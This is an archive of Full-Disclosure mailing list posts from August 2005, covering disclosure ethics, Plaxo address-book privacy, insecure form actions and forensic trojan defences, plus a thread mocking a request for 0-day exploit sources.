> and draw one for you.  Limiting knowledge of vulnerabilities to any
> select group (no matter who they are) is a bad idea, because it
> necessarily renders the uninformed incapable of self-protection.
> 
> In reality, this theory is denied by historical evidence, and stands
> directly opposed to virtually all actions of modern law enforcement.  
> I'll even use the analogy of a person moving illegal material (we can
> even say child porn, for simplicity's sake) to show you why your theory
> of disclosure is irreparably flawed.  Say I discover a weakness in the
> security measures of an airline, that allows me access to passenger
> luggage after it has been screened.  Clearly, the implications include a
> direct threat to human life: the scenario of explosives hidden in
> checked baggage is a very real threat.
> 
> Do I announce over the public address system that an airline's screening
> procedures are weak and easily defeated, and reveal the exact steps
> necessary to do so?  Of course not!  It's an engraved invitatio

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread sec-list

nullman wrote:

> try ifconfig -a and carefully read the output .. you may find a hint :-)

and: 'ipconfig /all' won't give you a hint :-P

GTi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] perfect security architecture (network)

2005-08-10 Thread Chuck Fullerton
That is the exact attitude of "Perfect Security".  If you have a small 10
person shop you're not going to purchase a big identity management solution.
You're going to spend a couple of hundred dollars to train you and your people
how to create and use strong passwords effectively.

EVERYONE in the industry must remember that ROI and TCO are king and queen.
If you can't justify the expenditure for the protection, then it's not
working.

The only exception to this rule is that everyone must take those basic
minimum steps to protect the systems under their control.  Such as,
firewalls, anti-virus, and updates.

I do a lot of work with the "Forgotten Market" of Small and Medium Business.
At this level ROI and TCO are critical to the success of the plan.  Smaller
companies don't have the capital to waste and recover from other areas like
the large enterprises do.

Chuck Fullerton
 

-Original Message-
From: C0BR4 [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 3:01 AM
To: [EMAIL PROTECTED]
Cc: Chuck Fullerton; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] perfect security architecture (network)

Hi All,

the point that I wanna make is "just make it simple". If I can work with what
I got, why do I have to invest?

If no tool provides 100% security, why not invest a little money in an awareness
program, policy design and especially restricting users from unnecessary applications.

thank you all for your valuable comments

C0br4

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Insecure http pages referencing https form-actions.

2005-08-10 Thread Leandro Meiners




Eric,

There was a long discussion about this at the [EMAIL PROTECTED] mailing list; check out the first mail in the archives at http://www.securityfocus.com/archive/107/402824/30/390/threaded

There is even a "Hall of shame" at http://AmirHerzberg.com/shame.html.

Regards,

Leandro.

Leandro Meiners
CYBSEC S.A. Security Systems
E-mail: [EMAIL PROTECTED]
Tel/Fax: [54-11] 4382-1600
Web: http://www.cybsec.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Help put a stop to incompetent computer forensics

2005-08-10 Thread trains

Quoting Jason Coombs <[EMAIL PROTECTED]>:

> Somehow we need to fix this broken system and insist that all 
> computer forensics be performed with the help of a competent 
> information security professional, at the very least.
>
> Any other suggestions?

Maybe we should start a certification program.  And we'll charge $5000 
a year to be certified so only serious players will get certified.  And 
we'll have roving "seminars" in all major cities taught only by our 
certified instructors.  Yeah, that's it.  And we'll rig the test so 
people have to take our useless classes to pass our useless tests.  
Then we'll dump press releases on every ZD rag out there and maybe pay 
a few CIOs and industry shills to comment on how, "hiring a 'certified 
computer corpse analyst' is the only way to determine competency".


Yeah.  That'll fix it.  tc


This message was sent using IMP, the Internet Messaging Program.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread nullman
you don't mean this seriously, do you ?
if you don't know what 127.0.0.1 is, you better unsubscribe ;-)

try ifconfig -a and carefully read the output .. you may find a hint :-)

nullman

P.S. This posting saved my day ... was completely depressed until I
found this .. now I can laugh again :-)

2005/8/10, Javi Polo <[EMAIL PROTECTED]>:
> On Aug/10/2005, [EMAIL PROTECTED] wrote:
> 
> > >can anybody suggest a website???
> > http://127.0.0.1/0-d-Xpl0iz
> 
> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.
> 
> [EMAIL PROTECTED]:~$
> 
> who runs the site?
> I want access
> 
> --
> Javier Polo @ Datagrama
> 902 136 126
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: RES: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread James Tucker
Firefox is somewhat amusing too:

---
The connection was refused when attempting to contact 127.0.0.1.

This may be because the site does not accept connections from your computer
---


On 8/10/05, Jose Ribeiro Junior <[EMAIL PROTECTED]> wrote:
> OFF TOPIC: How funny can the kids be?
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Javi Polo
> Sent: Wednesday, 10 August 2005 08:56
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] The best 0-day exploit source
> 
> 
> On Aug/10/2005, [EMAIL PROTECTED] wrote:
> 
> > >can anybody suggest a website???
> > http://127.0.0.1/0-d-Xpl0iz
> 
> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.
> 
> [EMAIL PROTECTED]:~$
> 
> who runs the site?
> I want access
> 
> --
> Javier Polo @ Datagrama
> 902 136 126
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RES: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Jose Ribeiro Junior
OFF TOPIC: How funny can the kids be?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Javi Polo
Sent: Wednesday, 10 August 2005 08:56
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] The best 0-day exploit source


On Aug/10/2005, [EMAIL PROTECTED] wrote:

> >can anybody suggest a website???
> http://127.0.0.1/0-d-Xpl0iz

[EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
--13:55:05--  http://127.0.0.1/0-d-Xpl0iz
   => `0-d-Xpl0iz'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
13:55:05 ERROR 403: Forbidden.

[EMAIL PROTECTED]:~$ 

who runs the site?
I want access

-- 
Javier Polo @ Datagrama
902 136 126


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Javi Polo
On Aug/10/2005, [EMAIL PROTECTED] wrote:

> >can anybody suggest a website???
> http://127.0.0.1/0-d-Xpl0iz

[EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
--13:55:05--  http://127.0.0.1/0-d-Xpl0iz
   => `0-d-Xpl0iz'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
13:55:05 ERROR 403: Forbidden.

[EMAIL PROTECTED]:~$ 

who runs the site?
I want access

-- 
Javier Polo @ Datagrama
902 136 126


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread sec-list

Ahmad N wrote:

> can anybody suggest a website???

http://127.0.0.1/0-d-Xpl0iz

GTi


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread tuytumadre
Hey, I know some 0-days! However, they took a while to find, so what are you gonna give me for them, Mr Ahmad? A guarantee that I will be visiting a website one day and be infected by a virus that you wrote with my exploit? No thanks, I have better plans for my hard work.

How about you stop spamming this already noobish list and try something you might be better at (like serving me fries at McDonald's).
 
Thanks
Paul
Greyhats Security
http://greyhatsecurity.org
-- Original message from Daniel <[EMAIL PROTECTED]>: --
> Is it me or has anyone else noticed that the overall skill factor for
> people "doing security" has diminished to such a low level that one
> shudders at the thought?
>
> Ahmad, try these (and yes you're gonna pay for them unless you code your own)
>
> http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0583.html
> Dave Aitel's CANVAS http://www.immunitysec.com/products-canvas.shtml
>
> but here is a hint... 0hdayz are kinda sekrit and not publicly
> available, no matter what you read in
> book title here>
>
> On 8/10/05, Ahmad N <[EMAIL PROTECTED]> wrote:
> > Hi there,
> >
> > I'm looking for the best 0-day exploit source, a source I can really count
> > on for the newest and most reliable exploits.
> >
> > can anybody suggest a website???
> >
> > Thx

Re: [Full-disclosure] Plaxo?

2005-08-10 Thread mis
On Wed, Aug 10, 2005 at 03:25:45PM +1000, Greg wrote:
> 
> - Original Message - 
> From: "Aditya Deshmukh" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>; 
> Sent: Wednesday, August 10, 2005 1:06 PM
> Subject: RE: [Full-disclosure] Plaxo?
> 
> 
> > 
> >> Aditya Deshmukh wrote:
> >> 
> >> > I need some advice about allowing plaxo running on my 
> >> internal network.
> >> > 
> >> > Shoud I allow it or ban it ?
> >> 
> >> Default deny.
> > 
> > Yes that's my kind of thinking! 
> > 

it seems to me the question should be "what is the business value to
your company of the service compared with the risk?"

in my mind "default" means "absent any way to assess these factors".


> >> 
> >> If you need to ask, there is clearly _no_ need to ask...
> >> 
> >> And a hint to clueful thinking about all such services -- how can you 
> >> (or your users) assure the confidentiality of your/their 
> >> address books 
> >> if they are being stored and managed offsite?

well, you could look at their privacy policy, and you could look at
their security stance as represented on their web page, and their
response to the one public incident i know of.  and if you aren't
satisfied, you can ask for more information.

their privacy policy restricts use of the data to its original
intended purpose, and requires opt-in for any additional uses,
says the data belongs to you, and restricts the data even in
the event of merger or acquisition.

see
http://www.plaxo.com/privacy/q_and_a#q2
for more info.

(but, since this is "full" disclosure, i did some work for plaxo
several years ago, and was quite happy with their attitude, the way
they did things, the high level of intelligence and competence and
particularly how responsive they were to fixing the problems i found,
which were more in the category of oversights than design problems or
massive brain damage.  but do not regard this as an endorsement that
their level of protection is appropriate for your asset, as i have
even less idea what your user's asset is worth than you have.)


> >> 
> >> That is not to say that such is not possible -- depending on the 
> >> standards you wish or need to maintain -- but do any of these quasi-
> >> anonymous web-based address book managers even start to take 
> >> the kinds 
> >> of steps necessary to assure you to the level you require?  And, how 
> >> can you be sure that they actually do meet those requirements?  Is 
> >> their "terms of service" document really a sufficient basis 
> >> on which to 
> >> form such a relationship?
> >> 
> > 
> > Certainly not! 

well, why should you trust *anyone* is a complicated issue.

you might as well ask why should you trust your employees, your
sysadmins, your consultants, your outsourcers, your vendors that you
pay money, the writers of the binary-only code that you run on your
machines, the company that you've outsourced spam filtering to, the
hosting facility that logs access to your company's web site, the 
outsourced telephone people that have access to your detail billing
records, the cell phone company that has access to your users' 
cell phone calling and geolocation history, the financial portal
that has your account numbers/passwords for your bank and brokerage 
accounts?

and while you're at it, you might ask why you should allow *IM and skype.

the answer is their reputation is tied up with their performance of
their represented services, and if you're careful and have enough budget,
you audit/verify/surveil the performance of people to whom you pay money
as part of the contract for service so you have some recourse.

but none of these people will pay the value of your loss, whether you
pay them money or not.

> > 
> > Why should I trust anyone with my users email address books ?

in some cases, for some users, for some companies, data about
communicating entities has substantial value. (e.g. investment
bankers, sales people, corporate lawyers, britney spears, osama bin
laden).  in others, they have little or no value -- your users are
probably able to make that determination better than you.

i personally believe some substantial information about volume of data
and timing of the data is needed to draw valuable conclusions from
traffic data, not just "alice added bob to their address book on date
x".  so i'd be more worried about the brightmails, messagelabs and
postinis of the world than the plaxos.

once you have answered the questions about the value of the asset
and the value of the business service, you might ask what the
plausible threat scenarios are.

if you're worried about a plaxo insider selling everybody's email
address to j random spamhaus, you have an awful lot more to worry about
than just plaxo.

i think it's legitimate to worry about a skilled outside attacker
being able to discover somebody's address book in a targeted attack
due to a weakness in the plaxo software.  you can bet that plaxo
has considered the problem.




> > 
> > And I would have to deal with the extra 

Re: [Full-disclosure] Help put a stop to incompetent computer forensics

2005-08-10 Thread James Tucker
On 8/10/05, Jason Coombs <[EMAIL PROTECTED]> wrote:
> "An experienced computer forensics person could tell you whether it was
> because of [a Trojan virus] or not." -- Marcus Lawson.

As you know, typical.
 
> This quote and article citation below concerning "computer forensics" is
> typical of the opinion of "computer forensics" professionals. We know
> it's a big fat lie told by self-important people who don't know anything
> about information security 

I understand you're upset with regard to this sort of stupid comment,
but I think you'd find you get a much more serious response if you
simply dump sentences like that. Insults aren't necessary - people
that know will already be sufficiently aware of it.

> and have never written software in their
> lives, but I'm asking anyone who reads this, who has ideas about how to
> put a stop to this "computer forensics" absurdity where people who don't
> know how software is written and don't understand infosec are allowed to
> be the voice of "computer forensics" expertise in court, to please
> contact me.

Simple - create a program which distributes random programs and data
across the internet and picks data/applications to execute at random.
From then on, one can make absolutely no solid judgement about ANY
information found on the machine, except by physical inspection of
that data and its paths, which is predictive and circumstantial
anyway due to a lack of support under law in most countries.
 
> In addition, anyone who has any information about computer forensics
> professional Marcus Lawson please contact me immediately.

Why dig up dirt? Just explain professionally why his actions are
incorrect. If you wanted you may be able to approach him under a
lawful banner with regard to submitting false testimony or evidence.
 
> The fact that malware authors aren't cooperating with the computer
> forensics industry by making sure that it's easy to distinguish between
> the actions of malware and the actions of a human computer user,
> combined with uninformed expert opinions like those shown below, is
> resulting in innocent people being put behind bars, and people like
> Marcus Lawson who think they know what they're doing but clearly do not
> are helping to get innocent people convicted by spewing nonsense.

Innocence is always subject to bias, as is everything else. Whilst
Lawson's statement above, in the general sense, is very much incorrect,
the specific circumstances may allow for such a statement to be made.
There are many malware which simply do not perform complex or
confusing operations and can therefore be very easily analysed to be
(mostly) sure that the malware was not responsible for the data in
question. Logs may indicate a user's physical presence which will
increase again the circumstantial evidence. It is and always will be
hard to make an accurate judgement for a court in such a scenario. As
an industry we should be providing statistical figures to back up any
claims which need to be made. If a user has booted a machine and
started printing fake bank notes out of the printer five minutes
later, having edited the images with some large image manipulation
program, it's really unlikely that the multitude of malware on the
machine could have contributed to his crime. Nevertheless if the
malware has touched any of the files on the local system, a computer
scientist may claim that we have no way of proving the user was
responsible - that is until the CCTV camera footage is presented. In
this field more than others, one must take circumstance with a pinch
of salt, and be very clear about what you DON'T know.
 
> This undermines the ability of the criminal court system to convict
> those who are truly guilty, and keep them convicted on appeal.

Bring on physical data analysis, that's all I have to say about that.

> Somehow we need to fix this broken system and insist that all computer
> forensics be performed with the help of a competent information security
> professional, at the very least.

Infosec is now such a large industry that as with most of the rest of
the computer industry, no one man can cover even a few percentiles of
the total spread of technologies. This makes qualification very
difficult. The best solution (and one which is becoming more common
worldwide) is to use highly practiced and well trained police officers
as forensics staff.
 
> Any other suggestions?

Yeah, next time let's claim it was the FBI's trojan, and they're
starting a big conspiracy trying to frame us all.
 
> Sincerely,
> 
> Jason Coombs
> [EMAIL PROTECTED]
> 
> 
> http://edition.cnn.com/2003/LAW/08/12/ctv.trojan/
> 
> Though it raises new and important issues, say industry sources, the
> Trojan Horse problem won't likely mint a new defense strategy: It's just
> a riff on the standard "not me" defense.
> 
> "There are a lot of child porn defendants who say, well, somebody else
> might have done it," said the EFF's Tien.  "But it doesn't fare very
> well, for obvious reas

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Daniel
Is it me or has anyone else noticed that the overall skill factor for
people "doing security" has diminished to such a low level that one
shudders at the thought?

Ahmad, try these (and yes you're gonna pay for them unless you code your own)

http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0583.html
Dave Aitel's CANVAS http://www.immunitysec.com/products-canvas.shtml

but here is a hint... 0hdayz are kinda sekrit and not publicly
available, no matter what you read in 

On 8/10/05, Ahmad N <[EMAIL PROTECTED]> wrote:
> Hi there, 
>   
> I'm looking for the best 0-day exploit source, a source I can really count 
> on for the newest and most reliable exploits. 
>   
> can anybody suggest a website??? 
>   
> Thx 


[Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Ahmad N
Hi there,
 
I'm looking for the best 0-day exploit source, a source I can really count
on for the newest and most reliable exploits.
 
can anybody suggest a website???
 
Thx